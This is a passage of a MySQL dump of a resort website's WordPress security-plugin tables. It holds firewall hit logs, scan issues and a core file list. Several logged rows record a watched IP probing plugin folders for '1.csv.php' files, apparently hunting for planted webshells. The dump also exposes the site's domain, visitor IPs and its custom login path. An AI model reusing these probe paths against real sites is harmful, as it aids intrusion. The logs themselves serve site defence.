51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcmxvZ29zaG93Y2FzZS13cC9zbHMtd3AtYWRtaW4vMS5jc3YucGhw\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXJsb2dvc2hvd2Nhc2Utd3Avc2xzLXdwLWFkbWluLzEuY3N2LnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL3d3dy5mYWNlYm9vay5uZXQvClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBydjo1Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzcyLjAKCg==\"}'),(175059,1603641260.187065,1603641259.613400,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/wp-content/plugins/super-interactive-maps/sim-wp-admin/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlci1pbnRlcmFjdGl2ZS1tYXBzL3NpbS13cC1hZG1pbi8xLmNzdi5waHA=\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXItaW50ZXJhY3RpdmUtbWFwcy9zaW0td3AtYWRtaW4vMS5jc3YucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vd3d3LmZhY2Vib29rLm5ldC8KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMApYLUh0dHBzOiAxCgo=\"}'),(175060,0.000000,1604081839.138790,'\0\0\0\0\0\0\0\0\0\0/ˉ',0,302,0,1,0,'https://ashbyresort.com/ar-login/','https://ashbyresort.com/ar-login','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36','loginOK',NULL,NULL);
/*!40000 ALTER TABLE `ar_wfHits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfHoover`
--

DROP TABLE IF EXISTS `ar_wfHoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfHoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfHoover`
--

LOCK TABLES `ar_wfHoover` WRITE;
/*!40000 ALTER TABLE `ar_wfHoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wfHoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfIssues`
--

DROP TABLE IF EXISTS `ar_wfIssues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfIssues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM AUTO_INCREMENT=6057 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfIssues`
--

LOCK TABLES `ar_wfIssues` WRITE;
/*!40000 ALTER TABLE `ar_wfIssues` DISABLE KEYS */;
INSERT INTO `ar_wfIssues` VALUES (6051,1593109445,1593109445,'new','skippedPaths',25,'6fd0d290b978eab8027e6b79501ac149','6fd0d290b978eab8027e6b79501ac149','2 paths were skipped for the malware scan due to scan settings','The option \"Scan files outside your WordPress installation\" is off by default, which means 2 paths and their file(s) will not be scanned for malware or unauthorized changes. To continue skipping these paths, you may ignore this issue. Or to start scanning them, enable the option and subsequent scans will include them. Some paths may not be necessary to scan, so this is optional. <a href=\"https://www.wordfence.com/help/?query=scan-result-skipped-paths\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a><br><br>The paths skipped are ~/CSS and ~/img','a:0:{}'),(6056,1593109484,1593109484,'new','wfPluginAbandoned',50,'9aedabdeaf5a4cd795fd4f3835c46083','9aedabdeaf5a4cd795fd4f3835c46083','The Plugin \"Devices for Elementor\" appears to be abandoned (updated July 5, 2017, tested to WP 4.8.14).','It was last updated 2 years 11 months ago and tested up to WordPress 4.8.14. Plugins can be removed from wordpress.org for various reasons. This can include benign issues like a plugin author discontinuing development or moving the plugin distribution to their own site, but some might also be due to security issues. In any case, future updates may or may not be available, so it is worth investigating the cause and deciding whether to temporarily or permanently replace or remove the plugin. <a href=\"https://www.wordfence.com/help/?query=scan-result-plugin-abandoned\" target=\"_blank\" rel=\"noopener noreferrer\">Get more information.</a>','a:21:{s:4:\"name\";s:21:\"Devices for Elementor\";s:4:\"slug\";s:17:\"devices-elementor\";s:7:\"version\";s:5:\"1.0.4\";s:6:\"author\";s:40:\"<a href=\"https://namogo.com/\">Namogo</a>\";s:14:\"author_profile\";s:37:\"https://profiles.wordpress.org/namogo\";s:8:\"requires\";s:3:\"4.5\";s:6:\"tested\";s:6:\"4.8.14\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}s:11:\"num_ratings\";i:8;s:15:\"support_threads\";i:1;s:24:\"support_threads_resolved\";i:0;s:12:\"last_updated\";s:21:\"2017-07-05 7:50am GMT\";s:8:\"homepage\";s:0:\"\";s:13:\"download_link\";s:66:\"https://downloads.wordpress.org/plugin/devices-elementor.1.0.4.zip\";s:18:\"author_block_count\";i:0;s:19:\"author_block_rating\";i:62;s:11:\"dateUpdated\";s:12:\"July 5, 2017\";s:9:\"abandoned\";b:1;s:10:\"vulnerable\";b:0;s:5:\"wpURL\";s:47:\"https://wordpress.org/plugins/devices-elementor\";}');
/*!40000 ALTER TABLE `ar_wfIssues` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wfKnownFileList`
--

DROP TABLE IF EXISTS `ar_wfKnownFileList`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wfKnownFileList` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=9015 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wfKnownFileList`
--

LOCK TABLES `ar_wfKnownFileList` WRITE;
/*!40000 ALTER TABLE `ar_wfKnownFileList` DISABLE KEYS */;
INSERT INTO `ar_wfKnownFileList` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wp-activate.php'),(5,'wp-admin/about.php'),(6,'wp-admin/admin-ajax.php'),(7,'wp-admin/admin-footer.php'),(8,'wp-admin/admin-functions.php'),(9,'wp-admin/admin-header.php'),(10,'wp-admin/admin-post.php'),(11,'wp-admin/admin.php'),(12,'wp-admin/async-upload.php'),(13,'wp-admin/comment.php'),(14,'wp-admin/credits.php'),(15,'wp-admin/css/about-rtl.css'),(16,'wp-admin/css/about-rtl.min.css'),(17,'wp-admin/css/about.css'),(18,'wp-admin/css/about.min.css'),(19,'wp-admin/css/admin-menu-rtl.css'),(20,'wp-admin/css/admin-menu-rtl.min.css'),(21,'wp-admin/css/admin-menu.css'),(22,'wp-admin/css/admin-menu.min.css'),(23,'wp-admin/css/code-editor-rtl.css'),(24,'wp-admin/css/code-editor-rtl.min.css'),(25,'wp-admin/css/code-editor.css'),(26,'wp-admin/css/code-editor.min.css'),(27,'wp-admin/css/color-picker-rtl.css'),(28,'wp-admin/css/color-picker-rtl.min.css'),(29,'wp-admin/css/color-picker.css'),(30,'wp-admin/css/color-picker.min.css'),(31,'wp-admin/css/colors/_admin.scss'),(32,'wp-admin/css/colors/_mixins.scss'),(33,'wp-admin/css/colors/_variables.scss'),(34,'wp-admin/css/colors/blue/colors-rtl.css'),(35,'wp-admin/css/colors/blue/colors-rtl.min.css'),(36,'wp-admin/css/colors/blue/colors.css'),(37,'wp-admin/css/colors/blue/colors.min.css'),(38,'wp-admin/css/colors/blue/colors.scss'),(39,'wp-admin/css/colors/coffee/colors-rtl.css'),(40,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(41,'wp-admin/css/colors/coffee/colors.css'),(42,'wp-admin/css/colors/coffee/colors.min.css'),(43,'wp-admin/css/colors/coffee/colors.scss'),(44,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(45,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(46,'wp-admin/css/colors/ectoplasm/colors.css'),(47,'wp-admin/css/colors/ectoplasm/colors.min.css'),(48,'wp-admin/css/colors/ectoplasm/colors.scss'),(49,'wp-admin/css/colors/light/colors-rtl.css'),(50,'wp-admin/css/colors/light/colors-rtl.min.css'),(51,'wp-admin/css/colors/light/colors.css'),(52,'wp-admin/css/colors/light/colors.min.css'),(53,'wp-admin/css/colors/light/colors.scss'),(54,'wp-admin/css/colors/midnight/colors-rtl.css'),(55,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(56,'wp-admin/css/colors/midnight/colors.css'),(57,'wp-admin/css/colors/midnight/colors.min.css'),(58,'wp-admin/css/colors/midnight/colors.scss'),(59,'wp-admin/css/colors/ocean/colors-rtl.css'),(60,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(61,'wp-admin/css/colors/ocean/colors.css'),(62,'wp-admin/css/colors/ocean/colors.min.css'),(63,'wp-admin/css/colors/ocean/colors.scss'),(64,'wp-admin/css/colors/sunrise/colors-rtl.css'),(65,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(66,'wp-admin/css/colors/sunrise/colors.css'),(67,'wp-admin/css/colors/sunrise/colors.min.css'),(68,'wp-admin/css/colors/sunrise/colors.scss'),(69,'wp-admin/css/common-rtl.css'),(70,'wp-admin/css/common-rtl.min.css'),(71,'wp-admin/css/common.css'),(72,'wp-admin/css/common.min.css'),(73,'wp-admin/css/customize-controls-rtl.css'),(74,'wp-admin/css/customize-controls-rtl.min.css'),(75,'wp-admin/css/customize-controls.css'),(76,'wp-admin/css/customize-controls.min.css'),(77,'wp-admin/css/customize-nav-menus-rtl.css'),(78,'wp-admin/css/customize-nav-menus-rtl.min.css'),(79,'wp-admin/css/customize-nav-menus.css'),(80,'wp-admin/css/customize-nav-menus.min.css'),(81,'wp-admin/css/customize-widgets-rtl.css'),(82,'wp-admin/css/customize-widgets-rtl.min.css'),(83,'wp-admin/css/customize-widgets.css'),(84,'wp-admin/css/customize-widgets.min.css'),(85,'wp-admin/css/dashboard-rtl.css'),(86,'wp-admin/css/dashboard-rtl.min.css'),(87,'wp-admin/css/dashboard.css'),(88,'wp-admin/css/dashboard.min.css'),(89,'wp-admin/css/deprecated-media-rtl.css'),(90,'wp-admin/css/deprecated-media-rtl.min.css'),(91,'wp-admin/css/deprecated-media.css'),(92,'wp-admin/css/deprecated-media.min.css'),(93,'wp-admin/css/edit-rtl.css'),(94,'wp-admin/css/edit-rtl.min.css'),(95,'wp-admin/css/edit.css'),(96,'wp-admin/css/edit.min.css'),(97,'wp-admin/css/farbtastic-rtl.css'),(98,'wp-admin/css/farbtastic-rtl.min.css'),(99,'wp-admin/css/farbtastic.css'),(100,'wp-admin/css/farbtastic.min.css'),(101,'wp-admin/css/forms-rtl.css'),(102,'wp-admin/css/forms-rtl.min.css'),(103,'wp-admin/css/forms.css'),(104,'wp-admin/css/forms.min.css'),(105,'wp-admin/css/ie-rtl.css'),(106,'wp-admin/css/ie-rtl.min.css'),(107,'wp-admin/css/ie.css'),(108,'wp-admin/css/ie.min.css'),(109,'wp-admin/css/install-rtl.css'),(110,'wp-admin/css/install-rtl.min.css'),(111,'wp-admin/css/install.css'),(112,'wp-admin/css/install.min.css'),(113,'wp-admin/css/l10n-rtl.css'),(114,'wp-admin/css/l10n-rtl.min.css'),(115,'wp-admin/css/l10n.css'),(116,'wp-admin/css/l10n.min.css'),(117,'wp-admin/css/list-tables-rtl.css'),(118,'wp-admin/css/list-tables-rtl.min.css'),(119,'wp-admin/css/list-tables.css'),(120,'wp-admin/css/list-tables.min.css'),(121,'wp-admin/css/login-rtl.css'),(122,'wp-admin/css/login-rtl.min.css'),(123,'wp-admin/css/login.css'),(124,'wp-admin/css/login.min.css'),(125,'wp-admin/css/media-rtl.css'),(126,'wp-admin/css/media-rtl.min.css'),(127,'wp-admin/css/media.css'),(128,'wp-admin/css/media.min.css'),(129,'wp-admin/css/nav-menus-rtl.css'),(130,'wp-admin/css/nav-menus-rtl.min.css'),(131,'wp-admin/css/nav-menus.css'),(132,'wp-admin/css/nav-menus.min.css'),(133,'wp-admin/css/revisions-rtl.css'),(134,'wp-admin/css/revisions-rtl.min.css'),(135,'wp-admin/css/revisions.css'),(136,'wp-admin/css/revisions.min.css'),(137,'wp-admin/css/site-health-rtl.css'),(138,'wp-admin/css/site-health-rtl.min.css'),(139,'wp-admin/css/site-health.css'),(140,'wp-admin/css/site-health.min.css'),(141,'wp-admin/css/site-icon-rtl.css'),(142,'wp-admin/css/site-icon-rtl.min.css'),(143,'wp-admin/css/site-icon.css'),(144,'wp-admin/css/site-icon.min.css'),(145,'wp-admin/css/themes-rtl.css'),(146,'wp-admin/css/themes-rtl.min.css'),(147,'wp-admin/css/themes.css'),(148,'wp-admin/css/themes.min.css'),(149,'wp-admin/css/widgets-rtl.css'),(150,'wp-admin/css/widgets-rtl.min.css'),(151,'wp-admin/css/widgets.css'),(152,'wp-admin/css/widgets.min.css'),(153,'wp-admin/css/wp-admin-rtl.css'),(154,'wp-admin/css/wp-admin-rtl.min.css'),(155,'wp-admin/css/wp-admin.css'),(156,'wp-admin/css/wp-admin.min.css'),(157,'wp-admin/custom-background.php'),(158,'wp-admin/custom-header.php'),(159,'wp-admin/customize.php'),(160,'wp-admin/edit-comments.php'),(161,'wp-admin/edit-form-advanced.php'),(162,'wp-admin/edit-form-blocks.php'),(163,'wp-admin/edit-form-comment.php'),(164,'wp-admin/edit-link-form.php'),(165,'wp-admin/edit-tag-form.php'),(166,'wp-admin/edit-tags.php'),(167,'wp-admin/edit.php'),(168,'wp-admin/erase-personal-data.php'),(169,'wp-admin/export-personal-data.php'),(170,'wp-admin/export.php'),(171,'wp-admin/freedoms.php'),(172,'wp-admin/images/align-center-2x.png'),(173,'wp-admin/images/align-center.png'),(174,'wp-admin/images/align-left-2x.png'),(175,'wp-admin/images/align-left.png'),(176,'wp-admin/images/align-none-2x.png'),(177,'wp-admin/images/align-none.png'),(178,'wp-admin/images/align-right-2x.png'),(179,'wp-admin/images/align-right.png'),(180,'wp-admin/images/arrows-2x.png'),(181,'wp-admin/images/arrows.png'),(182,'wp-admin/images/browser-rtl.png'),(183,'wp-admin/images/browser.png'),(184,'wp-admin/images/bubble_bg-2x.gif'),(185,'wp-admin/images/bubble_bg.gif'),(186,'wp-admin/images/comment-grey-bubble-2x.png'),(187,'wp-admin/images/comment-grey-bubble.png'),(188,'wp-admin/images/date-button-2x.gif'),(189,'wp-admin/images/date-button.gif'),(190,'wp-admin/images/generic.png'),(191,'wp-admin/images/icons32-2x.png'),(192,'wp-admin/images/icons32-vs-2x.png'),(193,'wp-admin/images/icons32-vs.png'),(194,'wp-admin/images/icons32.png'),(195,'wp-admin/images/imgedit-icons-2x.png'),(196,'wp-admin/images/imgedit-icons.png'),(197,'wp-admin/images/list-2x.png'),(198,'wp-admin/images/list.png'),(199,'wp-admin/images/loading.gif'),(200,'wp-admin/images/marker.png'),(201,'wp-admin/images/mask.png'),(202,'wp-admin/images/media-button-2x.png'),(203,'wp-admin/images/media-button-image.gif'),(204,'wp-admin/images/media-button-music.gif'),(205,'wp-admin/images/media-button-other.gif'),(206,'wp-admin/images/media-button-video.gif'),(207,'wp-admin/images/media-button.png'),(208,'wp-admin/images/menu-2x.png'),(209,'wp-admin/images/menu-vs-2x.png'),(210,'wp-admin/images/menu-vs.png'),(211,'wp-admin/images/menu.png'),(212,'wp-admin/images/no.png'),(213,'wp-admin/images/post-formats-vs.png'),(214,'wp-admin/images/post-formats.png'),(215,'wp-admin/images/post-formats32-vs.png'),(216,'wp-admin/images/post-formats32.png'),(217,'wp-admin/images/resize-2x.gif'),(218,'wp-admin/images/resize-rtl-2x.gif'),(219,'wp-admin/images/resize-rtl.gif'),(220,'wp-admin/images/resize.gif'),(221,'wp-admin/images/se.png'),(222,'wp-admin/images/sort-2x.gif'),(223,'wp-admin/images/sort.gif'),(224,'wp-admin/images/spinner-2x.gif'),(225,'wp-admin/images/spinner.gif'),(226,'wp-admin/images/stars-2x.png'),(227,'wp-admin/images/stars.png'),(228,'wp-admin/images/w-logo-blue.png'),(229,'wp-admin/images/w-logo-white.png'),(230,'wp-admin/images/wheel.png'),(231,'wp-admin/images/wordpress-logo-white.svg'),(232,'wp-admin/images/wordpress-logo.png'),(233,'wp-admin/images/wordpress-logo.svg'),(234,'wp-admin/images/wpspin_light-2x.gif'),(235,'wp-admin/images/wpspin_light.gif'),(236,'wp-admin/images/xit-2x.gif'),(237,'wp-admin/images/xit.gif'),(238,'wp-admin/images/yes.png'),(239,'wp-admin/import.php'),(240,'wp-admin/includes/admin-filters.php'),(241,'wp-admin/includes/admin.php'),(242,'wp-admin/includes/ajax-actions.php'),(243,'wp-admin/includes/bookmark.php'),(244,'wp-admin/includes/class-automatic-upgrader-skin.php'),(245,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(246,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(247,'wp-admin/includes/class-bulk-upgrader-skin.php'),(248,'wp-admin/includes/class-core-upgrader.php'),(249,'wp-admin/includes/class-custom-background.php'),(250,'wp-admin/includes/class-custom-image-header.php'),(251,'wp-admin/includes/class-file-upload-upgrader.php'),(252,'wp-admin/includes/class-ftp-pure.php'),(253,'wp-admin/includes/class-ftp-sockets.php'),(254,'wp-admin/includes/class-ftp.php'),(255,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(256,'wp-admin/includes/class-language-pack-upgrader.php'),(257,'wp-admin/includes/class-pclzip.php'),(258,'wp-admin/includes/class-plugin-installer-skin.php'),(259,'wp-admin/includes/class-plugin-upgrader-skin.php'),(260,'wp-admin/includes/class-plugin-upgrader.php'),(261,'wp-admin/includes/class-theme-installer-skin.php'),(262,'wp-admin/includes/class-theme-upgrader-skin.php'),(263,'wp-admin/includes/class-theme-upgrader.php'),(264,'wp-admin/includes/class-walker-category-checklist.php'),(265,'wp-admin/includes/class-walker-nav-menu-checklist.php'),(266,'wp-admin/includes/class-walker-nav-menu-edit.php'),(267,'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),(268,'wp-admin/includes/class-wp-automatic-updater.php'),(269,'wp-admin/includes/class-wp-comments-list-table.php'),(270,'wp-admin/includes/class-wp-community-events.php'),(271,'wp-admin/includes/class-wp-debug-data.php'),(272,'wp-admin/includes/class-wp-filesystem-base.php'),(273,'wp-admin/includes/class-wp-filesystem-direct.php'),(274,'wp-admin/includes/class-wp-filesystem-ftpext.php'),(275,'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),(276,'wp-admin/includes/class-wp-filesystem-ssh2.php'),(277,'wp-admin/includes/class-wp-importer.php'),(278,'wp-admin/includes/class-wp-internal-pointers.php'),(279,'wp-admin/includes/class-wp-links-list-table.php'),(280,'wp-admin/includes/class-wp-list-table-compat.php'),(281,'wp-admin/includes/class-wp-list-table.php'),(282,'wp-admin/includes/class-wp-media-list-table.php'),(283,'wp-admin/includes/class-wp-ms-sites-list-table.php'),(284,'wp-admin/includes/class-wp-ms-themes-list-table.php'),(285,'wp-admin/includes/class-wp-ms-users-list-table.php'),(286,'wp-admin/includes/class-wp-plugin-install-list-table.php'),(287,'wp-admin/includes/class-wp-plugins-list-table.php'),(288,'wp-admin/includes/class-wp-post-comments-list-table.php'),(289,'wp-admin/includes/class-wp-posts-list-table.php'),(290,'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php'),(291,'wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php'),(292,'wp-admin/includes/class-wp-privacy-policy-content.php'),(293,'wp-admin/includes/class-wp-privacy-requests-table.php'),(294,'wp-admin/includes/class-wp-screen.php'),(295,'wp-admin/includes/class-wp-site-health-auto-updates.php'),(296,'wp-admin/includes/class-wp-site-health.php'),(297,'wp-admin/includes/class-wp-site-icon.php'),(298,'wp-admin/includes/class-wp-terms-list-table.php'),(299,'wp-admin/includes/class-wp-theme-install-list-table.php'),(300,'wp-admin/includes/class-wp-themes-list-table.php'),(301,'wp-admin/includes/class-wp-upgrader-skin.php'),(302,'wp-admin/includes/class-wp-upgrader-skins.php'),(303,'wp-admin/includes/class-wp-upgrader.php'),(304,'wp-admin/includes/class-wp-users-list-table.php'),(305,'wp-admin/includes/comment.php'),(306,'wp-admin/includes/continents-cities.php'),(307,'wp-admin/includes/credits.php'),(308,'wp-admin/includes/dashboard.php'),(309,'wp-admin/includes/deprecated.php'),(310,'wp-admin/includes/edit-tag-messages.php'),(311,'wp-admin/includes/export.php'),(312,'wp-admin/includes/file.php'),(313,'wp-admin/includes/image-edit.php'),(314,'wp-admin/includes/image.php'),(315,'wp-admin/includes/import.php'),(316,'wp-admin/includes/list-table.php'),(317,'wp-admin/includes/media.php'),(318,'wp-admin/includes/menu.php'),(319,'wp-admin/includes/meta-boxes.php'),(320,'wp-admin/includes/misc.php'),(321,'wp-admin/includes/ms-admin-filters.php'),(322,'wp-admin/includes/ms-deprecated.php'),(323,'wp-admin/includes/ms.php'),(324,'wp-admin/includes/nav-menu.php'),(325,'wp-admin/includes/network.php'),(326,'wp-admin/includes/noop.php'),(327,'wp-admin/includes/options.php'),(328,'wp-admin/includes/plugin-install.php'),(329,'wp-admin/includes/plugin.php'),(330,'wp-admin/includes/post.php'),(331,'wp-admin/includes/privacy-tools.php'),(332,'wp-admin/includes/revision.php'),(333,'wp-admin/includes/schema.php'),(334,'wp-admin/includes/screen.php'),(335,'wp-admin/includes/taxonomy.php'),(336,'wp-admin/includes/template.php'),(337,'wp-admin/includes/theme-install.php'),(338,'wp-admin/includes/theme.php'),(339,'wp-admin/includes/translation-install.php'),(340,'wp-admin/includes/update-core.php'),(341,'wp-admin/includes/update.php'),(342,'wp-admin/includes/upgrade.php'),(343,'wp-admin/includes/user.php'),(344,'wp-admin/includes/widgets.php'),(345,'wp-admin/index.php'),(346,'wp-admin/install-helper.php'),(347,'wp-admin/install.php'),(348,'wp-admin/js/accordion.js'),(349,'wp-admin/js/accordion.min.js'),(350,'wp-admin/js/code-editor.js'),(351,'wp-admin/js/code-editor.min.js'),(352,'wp-admin/js/color-picker.js'),(353,'wp-admin/js/color-picker.min.js'),(354,'wp-admin/js/comment.js'),(355,'wp-admin/js/comment.min.js'),(356,'wp-admin/js/common.js'),(357,'wp-admin/js/common.min.js'),(358,'wp-admin/js/custom-background.js'),(359,'wp-admin/js/custom-background.min.js'),(360,'wp-admin/js/custom-header.js'),(361,'wp-admin/js/customize-controls.js'),(362,'wp-admin/js/customize-controls.min.js'),(363,'wp-admin/js/customize-nav-menus.js'),(364,'wp-admin/js/customize-nav-menus.min.js'),(365,'wp-admin/js/customize-widgets.js'),(366,'wp-admin/js/customize-widgets.min.js'),(367,'wp-admin/js/dashboard.js'),(368,'wp-admin/js/dashboard.min.js'),(369,'wp-admin/js/edit-comments.js'),(370,'wp-admin/js/edit-comments.min.js'),(371,'wp-admin/js/editor-expand.js'),(372,'wp-admin/js/editor-expand.min.js'),(373,'wp-admin/js/editor.js'),(374,'wp-admin/js/editor.min.js'),(375,'wp-admin/js/farbtastic.js'),(376,'wp-admin/js/gallery.js'),(377,'wp-admin/js/gallery.min.js'),(378,'wp-admin/js/image-edit.js'),(379,'wp-admin/js/image-edit.min.js'),(380,'wp-admin/js/inline-edit-post.js'),(381,'wp-admin/js/inline-edit-post.min.js'),(382,'wp-admin/js/inline-edit-tax.js'),(383,'wp-admin/js/inline-edit-tax.min.js'),(384,'wp-admin/js/iris.min.js'),(385,'wp-admin/js/language-chooser.js'),(386,'wp-admin/js/language-chooser.min.js'),(387,'wp-admin/js/link.js'),(388,'wp-admin/js/link.min.js'),(389,'wp-admin/js/media-gallery.js'),(390,'wp-admin/js/media-gallery.min.js'),(391,'wp-admin/js/media-upload.js'),(392,'wp-admin/js/media-upload.min.js'),(393,'wp-admin/js/media.js'),(394,'wp-admin/js/media.min.js'),(395,'wp-admin/js/nav-menu.js'),(396,'wp-admin/js/nav-menu.min.js'),(397,'wp-admin/js/password-strength-meter.js'),(398,'wp-admin/js/password-strength-meter.min.js'),(399,'wp-admin/js/plugin-install.js'),(400,'wp-admin/js/plugin-install.min.js'),(401,'wp-admin/js/post.js'),(402,'wp-admin/js/post.min.js'),(403,'wp-admin/js/postbox.js'),(404,'wp-admin/js/postbox.min.js'),(405,'wp-admin/js/privacy-tools.js'),(406,'wp-admin/js/privacy-tools.min.js'),(407,'wp-admin/js/revisions.js'),(408,'wp-admin/js/revisions.min.js'),(409,'wp-admin/js/set-post-thumbnail.js'),(410,'wp-admin/js/set-post-thumbnail.min.js'),(411,'wp-admin/js/site-health.js'),(412,'wp-admin/js/site-health.min.js'),(413,'wp-admin/js/svg-painter.js'),(414,'wp-admin/js/svg-painter.min.js'),(415,'wp-admin/js/tags-box.js'),(416,'wp-admin/js/tags-box.min.js'),(417,'wp-admin/js/tags-suggest.js'),(418,'wp-admin/js/tags-suggest.min.js'),(419,'wp-admin/js/tags.js'),(420,'wp-admin/js/tags.min.js'),(421,'wp-admin/js/theme-plugin-editor.js'),(422,'wp-admin/js/theme-plugin-editor.min.js'),(423,'wp-admin/js/theme.js'),(424,'wp-admin/js/theme.min.js'),(425,'wp-admin/js/updates.js'),(426,'wp-admin/js/updates.min.js'),(427,'wp-admin/js/user-profile.js'),(428,'wp-admin/js/user-profile.min.js'),(429,'wp-admin/js/user-suggest.js'),(430,'wp-admin/js/user-suggest.min.js'),(431,'wp-admin/js/widgets/custom-html-widgets.js'),(432,'wp-admin/js/widgets/custom-html-widgets.min.js'),(433,'wp-admin/js/widgets/media-audio-widget.js'),(434,'wp-admin/js/widgets/media-audio-widget.min.js'),(435,'wp-admin/js/widgets/media-gallery-widget.js'),(436,'wp-admin/js/widgets/media-gallery-widget.min.js'),(437,'wp-admin/js/widgets/media-image-widget.js'),(438,'wp-admin/js/widgets/media-image-widget.min.js'),(439,'wp-admin/js/widgets/media-video-widget.js'),(440,'wp-admin/js/widgets/media-video-widget.min.js'),(441,'wp-admin/js/widgets/media-widgets.js'),(442,'wp-admin/js/widgets/media-widgets.min.js'),(443,'wp-admin/js/widgets/text-widgets.js'),(444,'wp-admin/js/widgets/text-widgets.min.js'),(445,'wp-admin/js/widgets.js'),(446,'wp-admin/js/widgets.min.js'),(447,'wp-admin/js/word-count.js'),(448,'wp-admin/js/word-count.min.js'),(449,'wp-admin/js/xfn.js'),(450,'wp-admin/js/xfn.min.js'),(451,'wp-admin/link-add.php'),(452,'wp-admin/link-manager.php'),(453,'wp-admin/link-parse-opml.php'),(454,'wp-admin/link.php'),(455,'wp-admin/load-scripts.php'),(456,'wp-admin/load-styles.php'),(457,'wp-admin/maint/repair.php'),(458,'wp-admin/media-new.php'),(459,'wp-admin/media-upload.php'),(460,'wp-admin/media.php'),(461,'wp-admin/menu-header.php'),(462,'wp-admin/menu.php'),(463,'wp-admin/moderation.php'),(464,'wp-admin/ms-admin.php'),(465,'wp-admin/ms-delete-site.php'),(466,'wp-admin/ms-edit.php'),(467,'wp-admin/ms-options.php'),(468,'wp-admin/ms-sites.php'),(469,'wp-admin/ms-themes.php'),(470,'wp-admin/ms-upgrade-network.php'),(471,'wp-admin/ms-users.php'),(472,'wp-admin/my-sites.php'),(473,'wp-admin/nav-menus.php'),(474,'wp-admin/network/about.php'),(475,'wp-admin/network/admin.php'),(476,'wp-admin/network/credits.php'),(477,'wp-admin/network/edit.php'),(478,'wp-admin/network/freedoms.php'),(479,'wp-admin/network/index.php'),(480,'wp-admin/network/menu.php'),(481,'wp-admin/network/plugin-editor.php'),(482,'wp-admin/network/plugin-install.php'),(483,'wp-admin/network/plugins.php'),(484,'wp-admin/network/privacy.php'),(485,'wp-admin/network/profile.php'),(486,'wp-admin/network/settings.php'),(487,'wp-admin/network/setup.php'),(488,'wp